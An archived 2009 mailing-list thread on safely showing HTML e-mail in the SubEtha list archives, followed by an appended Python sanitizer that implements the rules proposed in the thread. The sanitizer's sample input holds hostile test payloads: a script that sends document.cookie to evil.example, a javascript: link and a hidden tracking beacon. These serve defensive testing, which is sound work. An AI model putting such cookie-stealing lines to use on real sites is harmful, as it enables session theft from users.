After doing a bit of research, the best approach is probably to figure out
how to integrate Caja.
http://code.google.com/p/google-caja/wiki/CajaCajole
jon
My blog: http://lookfirst.com/
On Mon, Jun 15, 2009 at 5:02 PM, shop <shop@pmcs-inc.com> wrote:
> My definition of sanitized is fairly straightforward:
>
> - No scripts
>
> - No scripts in links (somewhat redundant, I know)
>
> - No links that point directly off-site
>
> - No embeds that point directly off-site (displaying attached
> images is fine)
>
> This would, of course, break quite a few HTML e-mails, but should be
> reasonable.
>
> A little simple encoding with a seed generated randomly per page view for
> links and off-site embeds which could be reversible in the browser with
> JavaScript if a user agrees should handle that problem. This would give you
> an Outlook- and Thunderbird-like “Enable links and embedded images in this
> message” button.
>
> Using a separate root subdirectory (subethamail.org/disp/* instead of
> subethamail.org/se/*) for display of HTML e-mails would let you restrict
> cookies to the /se/* path and reduce the chance of cookie stealing.
>
> *From:* users@subethamail.org [mailto:users@subethamail.org] *On Behalf Of
> *Jon Stevens
> *Sent:* Monday, June 15, 2009 4:50 PM
> *To:* users@subethamail.org
> *Subject:* Re: HTML e-mail support
>
> I'm not disagreeing with you about the quality of the display of our
> archives. It could definitely use some improvement.
>
> It would be pretty easy to modify the template to not show anything other
> than the text/plain portion, but then what happens when there isn't a
> text/plain portion? You would get a blank page. A link to a sanitized* HTML
> version is also just as hard to securely display in a linked page as it
> would be in the actual page.
>
> * define 'sanitized'. No embedded content? Nothing that can steal your
> cookies?
>
> So, if you come up with a workable solution that makes you happy, let me
> know. Unfortunately, we are dealing with a pretty complicated problem here.
>
> jon
>
> My blog: http://lookfirst.com/
>
> On Mon, Jun 15, 2009 at 3:42 PM, shop <shop@pmcs-inc.com> wrote:
>
> Pretty would be nice…
>
> Ideally I’d like to see the plain text version, or a properly sanitized
> version if it’s not multipart in the archives. A link to a sanitized HTML
> version would be nice, as embedding it directly or displaying as-is is a
> fairly bad idea from a security and privacy perspective.
>
> -Chris
>
> *From:* users@subethamail.org [mailto:users@subethamail.org] *On Behalf Of
> *Jon Stevens
> *Sent:* Monday, June 15, 2009 3:36 PM
> *To:* users@subethamail.org
> *Subject:* Re: HTML e-mail support
>
> Well, that is up for interpretation. =) How would you like it to appear in
> the archives?
>
> jon
>
> My blog: http://lookfirst.com/
>
> On Mon, Jun 15, 2009 at 3:26 PM, shop <shop@pmcs-inc.com> wrote:
>
> Though not in the archive…
>
> *From:* users@subethamail.org [mailto:users@subethamail.org] *On Behalf Of
> *Jon Stevens
> *Sent:* Monday, June 15, 2009 2:57 PM
> *To:* users@subethamail.org
> *Subject:* Re: HTML e-mail support
>
> Clearly handles it just fine.
>
> jon
>
> On Mon, Jun 15, 2009 at 2:49 PM, shop <shop@pmcs-inc.com> wrote:
>
> Looking at the documentation <http://code.google.com/p/subetha/w/list> and
> mailing list archives <http://www.subethamail.org/se/archive.jsp?listId=4>,
> it is not clear how well SubEtha handles HTML e-mails such as *this one*.
>
> Would you enlighten me please? I’m hoping to deploy SubEtha, well,
> tomorrow.
>
> [image: sewious.jpg]
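As an added example, not code from SubEtha or from anyone in this thread, here is a small Python sanitizer that implements the four rules Chris lists (no scripts, no scripts in links, no off-site links, no off-site embeds except attached cid: images) together with the per-page-view encoding he proposes for the "Enable links and embedded images" button. The archive hostname subethamail.org, the data-offsite-* attribute names, the tag and attribute allowlists and the sample message are all assumptions made for the example.

```python
import base64
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

ARCHIVE_HOST = "subethamail.org"   # assumed archive host (from the thread's URLs); all else is off-site

# Allowlist: unknown elements are dropped but their text kept; DROP_WITH_CONTENT elements
# (scripts, stylesheets, frames, forms, SVG/MathML) are dropped with everything inside them.
ALLOWED_TAGS = {"a", "b", "i", "u", "em", "strong", "p", "br", "hr", "div", "span", "ul", "ol", "li",
                "blockquote", "pre", "code", "img", "table", "tr", "td", "th", "h1", "h2", "h3", "h4"}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "applet", "form", "head", "title", "svg", "math"}
VOID_TAGS = {"br", "hr", "img"}
SAFE_ATTRS = {"href", "src", "alt", "title", "width", "height", "colspan", "rowspan"}  # on*, style: dropped


def classify(url):
    """'onsite' (relative, cid:, or ARCHIVE_HOST), 'offsite' (http/https/mailto elsewhere), else 'bad'."""
    url = "".join(ch for ch in url.strip() if ord(ch) >= 0x20)   # defeats "java\nscript:" smuggling
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme == "cid":                                           # attached images are fine
        return "onsite"
    if scheme in ("", "http", "https"):
        return "onsite" if not parts.netloc or parts.hostname == ARCHIVE_HOST else "offsite"
    return "offsite" if scheme == "mailto" else "bad"             # javascript:, data:, vbscript: ...


def obfuscate(url, seed):
    """Repeating-key XOR + base64url so the browser cannot fetch the URL on its own.
    Obfuscation, not encryption: the per-page-view seed is handed to the page's own script."""
    raw = url.encode("utf-8")
    return base64.urlsafe_b64encode(bytes(b ^ seed[i % len(seed)] for i, b in enumerate(raw))).decode()


def reveal(token, seed):
    """Inverse of obfuscate(); the 'Enable links' JavaScript would do exactly this on consent."""
    raw = base64.urlsafe_b64decode(token)
    return bytes(b ^ seed[i % len(seed)] for i, b in enumerate(raw)).decode("utf-8")


class ArchiveSanitizer(HTMLParser):
    def __init__(self, seed):
        super().__init__(convert_charrefs=True)   # comments are discarded by the base class
        self.seed, self.out, self.blocked = seed, [], []
        self.skip_depth = 0                     # > 0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:        # track nesting, e.g. <script> inside <form>
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1                 # an unclosed one drops the rest: fails closed
            return
        if tag not in ALLOWED_TAGS:
            return
        rendered = [tag]
        for name, value in attrs:
            name, value = name.lower(), value or ""
            if name not in SAFE_ATTRS:
                continue
            if name in ("href", "src"):
                kind = classify(value)
                if kind == "bad":               # no scripts in links
                    continue
                if kind == "offsite":           # neutralised; the user can opt in later
                    self.blocked.append(value)
                    rendered.append(f'data-offsite-{name}="{obfuscate(value, self.seed)}"')
                    continue
            rendered.append(f'{name}="{html.escape(value, quote=True)}"')
        self.out.append("<" + " ".join(rendered) + ">")

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))   # entities were decoded; re-escape


def sanitize(html_body, seed):
    """Return (sanitized_html, blocked_offsite_urls) for one text/html mail part."""
    parser = ArchiveSanitizer(seed)
    parser.feed(html_body)
    parser.close()
    return "".join(parser.out), parser.blocked


# Constructed sample mail (not from the thread) hitting every rule at least once.
SAMPLE_MAIL = (
    '<p onclick="alert(1)">Hi <b>there</b></p>'
    '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
    '<a href="javascript:alert(document.cookie)">click</a>'
    '<a href="http://subethamail.org/se/archive.jsp?listId=4">archive</a>'
    '<a href="http://evil.example/track">offsite</a>'
    '<img src="cid:image001.jpg@01C9EDDA.09697750" alt="sewious.jpg">'
    '<img src="http://evil.example/beacon.gif" style="display:none">'
)
```

Call it as `sanitize(SAMPLE_MAIL, os.urandom(16))` with a fresh seed on every page view; the page embeds that seed and the button's JavaScript walks the `data-offsite-href` / `data-offsite-src` attributes, runs the same XOR-and-base64url inverse as `reveal()`, and only then writes real `href` / `src` attributes, so nothing off-site is fetched until the reader asks. The XOR is deliberately weak, as Chris says ("a little simple encoding"): its only job is to stop the browser from auto-loading the URL, not to keep it secret. One caveat on the cookie-path idea: the same-origin policy ignores the path, so a script served under /disp/ could still frame /se/ and read it; path scoping limits what `document.cookie` exposes directly, but the sanitizer (or a separate hostname for the display pages) has to be the actual boundary.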